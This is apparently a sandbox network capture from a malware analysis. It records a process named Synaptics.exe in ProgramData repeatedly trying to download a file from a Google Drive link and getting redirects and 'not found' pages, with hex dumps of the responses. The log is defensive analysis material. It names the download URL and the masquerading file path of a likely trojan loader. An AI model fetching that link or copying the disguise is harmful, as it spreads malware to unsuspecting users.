                                                                                                                                                                                    2024-12-30 10:51:59 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 5f 71 79 6d 33 51 75 4a 78 4b 47 33 6d 44 34 51 6b 62 50 64 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="g_qym3QuJxKG3mD4QkbPdA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:59 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    76192.168.2.452032142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:00 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:00 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:00 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-kN4ZHBpEVvez7AdhH4vC0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    77192.168.2.452034142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:00 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:00 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:00 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-b3PU6OG_gVDN9_UGFWCcWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    78192.168.2.452035142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:00 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:00 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6s0DPqGYYLfhlaEAT8g46o-ov3BA1vvIYzxwFXfekHAQkArvTHx4IYQTmw67Zy0SBP
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:00 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-jnJnlOxdgDVPHxvNCaCxyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:00 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:00 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 55 78 43 70 36 30 6a 67 38 6d 46 34 72 77 7a 55 75 30 74 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="fUxCp60jg8mF4rwzUu0tTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:00 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    79192.168.2.452037142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:00 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:00 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5UhNSDuX1yXEPB2Y1vJDTgDId2tCSvXesF0IKwfgd9meoe7Kkojsv2HYVHnZ7p3RxWB5EsBTM
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:00 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-1UZgnY1lPp7Gm32Gxp9NCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:00 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:52:00 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 66 73 53 49 52 79 46 55 6c 77 4b 38 6e 67 62 46 76 33 47 64 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="YfsSIRyFUlwK8ngbFv3GdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:52:00 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    80192.168.2.452044142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:01 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    81192.168.2.452045142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:01 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    82192.168.2.452047142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:01 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    83192.168.2.452048142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:01 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    84192.168.2.452056142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:02 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:02 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-gMkm5pyN2RY_PxlqzkBMXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    85192.168.2.452057142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:02 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:02 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TnALGwFNLHMZQDHGwbiypg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
